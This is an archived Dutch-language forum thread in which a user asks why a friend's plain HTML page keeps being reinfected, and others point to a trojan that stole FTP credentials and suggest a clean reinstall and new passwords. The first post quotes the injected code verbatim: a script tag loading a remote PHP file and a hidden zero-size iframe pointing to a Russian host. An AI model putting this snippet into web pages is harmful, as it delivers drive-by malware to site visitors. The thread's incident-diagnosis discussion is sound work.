Archief - Hackers ???

Het archief is een bevroren moment uit een vorige versie van dit forum, met andere regels en andere bazen. Deze posts weerspiegelen op geen enkele manier onze huidige ideeën, waarden of wereldbeelden en zijn op sommige plaatsen gecensureerd wegens ontoelaatbaar. Veel zijn in een andere tijdsgeest gemaakt, al dan niet ironisch - zoals in het ironische subforum Off-Topic - en zouden op dit moment niet meer gepost (mogen) worden. Toch bieden we dit archief nog graag aan als informatiedatabank en naslagwerk. Lees er hier meer over of start een gesprek met anderen.
H

HansP

Legacy Member
Ik heb volgend probleem bij een kennis van me hun site ...

We uploaden bvb volgende Index.html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<style type="text/css">
<!--
body {
background-color: #000000;
}
-->
</style></head>
<body>
<table width="200" border="1" align="center" cellpadding="0" cellspacing="0">
<tr>
<td><img src="WEBSITE_TERDOLEN.jpg" width="605" height="528" /></td>
</tr>
</table>
</body>
</html>
Klik om te vergroten...

en ineens komt hier deze code bij opstaan :
> <script src=http://ngw.school.in.th/themes/ktb-support.php
> ></script><body><iframe frameborder="0" onload="if (!this.src){
> this.src='http://lifezilla.ru:8080/index.php'; this.height='0';
> this.width='0';}" >amdvocsxgkyyikkqkdbgyrjtjvbrumq</iframe>
> <table width="200" border="1" align="center" cellpadding="0" cellspacing="0">
Klik om te vergroten...

Nu hebben wij de originele HTML overschreven op de server
2u later komt is dit ineens de pagina bron
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<style type="text/css">
<!--
body {
background-color: #000000;
}
-->
</style></head>
<script src=http://ngw.school.in.th/themes/ktb-support.php ></script><body>
<table width="200" border="1" align="center" cellpadding="0" cellspacing="0">
<tr>
<td><img src="WEBSITE_TERDOLEN.jpg" width="605" height="528" /></td>
</tr>
</table>
</body>
</html>
Klik om te vergroten...

Weet iemand wat dit kan zijn ?

We krijgen overal telkens virusmeldingen en al paar PC's die gecrasht zijn hierdoor !!!
er zijn 3 sites van de webdesigner die dat hebben tschijnt en alle 3 idem problemen :s
2 zijn gehost op belgacom skynet en 1tje op telenet...
a

adrianhates

Legacy Member
-=Spyder.LA=- zei:
Ik heb volgend probleem bij een kennis van me hun site ...

We uploaden bvb volgende Index.html



en ineens komt hier deze code bij opstaan :


Nu hebben wij de originele HTML overschreven op de server
2u later komt is dit ineens de pagina bron


Weet iemand wat dit kan zijn ?

We krijgen overal telkens virusmeldingen en al paar PC's die gecrasht zijn hierdoor !!!
er zijn 3 sites van de webdesigner die dat hebben tschijnt en alle 3 idem problemen :s
2 zijn gehost op belgacom skynet en 1tje op telenet...
Klik om te vergroten...

provider contacteren.
H

HansP

Legacy Member
tzijn op 2 providers da et zelfde probleem is ... zou da toeval zijn ?
p

passero

Legacy Member
staat er een cms op? Mss hebben de hackers een bug gevonden in een cms ofzo dat ge hebt geïnstalleerd.
H

HansP

Legacy Member
neen , is gewoon een index file met een JPG en achtergrondkleurke ...
d

dendaak

Legacy Member
Als ge een beetje research doet ziede dat het Turkse hackers zijn.
H

HansP

Legacy Member
ja ma waarom als die index.htm overschreven word door de originele word die na 2u terug geinfected ???

die ''webmaster'' en een ''expert'' waren 2 mnd aant zoeke achter waarom hun virusscanner altijd afging en ik zag in 10sec dat er iet niet klopte in die bron

ma na overschrijven komt da gewoon na een paar uur terug in de originele code staan :s
dat is het rare
is de host dan infected ? dan moeten toch meer sites dat hebben ??
a

adrianhates

Legacy Member
wardkennes zei:
Als ge een beetje research doet ziede dat het Turkse hackers zijn.
Klik om te vergroten...

'http://lifezilla.ru:8080/index.php
en russische :D

Wederom : contacteer uw provider(s)!
Waarschijnlijk is uw systeem of dat van hun besmet en dan moogde da ni meer vertrouwen.
Format en clean install is de enige optie
b

bugoff

Legacy Member
Gebruik je op de 2 servers hetzelfde wachtwoord, zijn die wachtwoorden verkregen via mail?

Zoals adrianhates al vertelde laat zeker eens een virusscanner op uw pc los, wss heb je last van wat beestjes :)
B

Bv202

Legacy Member
Verander best gewoon van host. Als dit al 2 maanden zo is en ze er nog altijd niks aan doen, lijkt het me niet de moeite om die mensen te gaan betalen.
H

HansP

Legacy Member
tis niet mijn systeem :p
ze hebbe dr 2 mnd achter zitte zoeke hoe het kwam en ik zag op 10sec dat er iets ni goe was aan die broncode ...

heb het doorgegeven , skynet beweert da de webmaster ne trojan heeft en zo via haar FTP programma inlogt bij de opgeslagen servers ...
beetje vergezocht vindk
Z

Zero Grav

Legacy Member
Ik vind dat effectief een logischere denkpiste als dat het bij de hosting zou liggen. Puur omdat het skynet is en dat die zo ontelbaar veel spaces hebben op dezelfde systemen waardoor zoiets dus direct algemeen bekend zou worden.

Anders zou ik denken dat er misschien via een htaccess ofzo data aan die html files wordt toegevoegd. Ik geloof niet dat dit mogelijk is via htaccess files, maar er zijn wel bepaalde manieren om het te bereiken. Bij lycos deden ze bijvoorbeeld zoiets indertijd.
a

adrianhates

Legacy Member
-=Spyder.LA=- zei:
heb het doorgegeven , skynet beweert da de webmaster ne trojan heeft en zo via haar FTP programma inlogt bij de opgeslagen servers ...
beetje vergezocht vindk
Klik om te vergroten...

dan moet ze nekeer format en clean install doen he. Pas natuurlijk op met die files te downloaden dan.

Als het dan nog blijft voorvallen dan ligt het aan uw provider.
d

dJeez

Legacy Member
adrianhates zei:
dan moet ze nekeer format en clean install doen he.
Klik om te vergroten...
En direct de paswoorden van je (FTP) accounts wijzigen - vanop een niet geïnfecteerde PC uiteraard.
b

bugoff

Legacy Member
-=Spyder.LA=- zei:
tis niet mijn systeem :p
ze hebbe dr 2 mnd achter zitte zoeke hoe het kwam en ik zag op 10sec dat er iets ni goe was aan die broncode ...

heb het doorgegeven , skynet beweert da de webmaster ne trojan heeft en zo via haar FTP programma inlogt bij de opgeslagen servers ...
beetje vergezocht vindk
Klik om te vergroten...

Helaas is dit niet vergezocht, maar is dit echt waar.

In de zomer periodes hebben wij altijd wel een of 2 accounts die zo geinfecteerd worden.
a

adrianhates

Legacy Member
bugoff zei:
Helaas is dit niet vergezocht, maar is dit echt waar.

In de zomer periodes hebben wij altijd wel een of 2 accounts die zo geinfecteerd worden.
Klik om te vergroten...

Heb je een idéé waarom in de zomer periodes? :)
Het archief is een bevroren moment uit een vorige versie van dit forum, met andere regels en andere bazen. Deze posts weerspiegelen op geen enkele manier onze huidige ideeën, waarden of wereldbeelden en zijn op sommige plaatsen gecensureerd wegens ontoelaatbaar. Veel zijn in een andere tijdsgeest gemaakt, al dan niet ironisch - zoals in het ironische subforum Off-Topic - en zouden op dit moment niet meer gepost (mogen) worden. Toch bieden we dit archief nog graag aan als informatiedatabank en naslagwerk. Lees er hier meer over of start een gesprek met anderen.
Terug
Bovenaan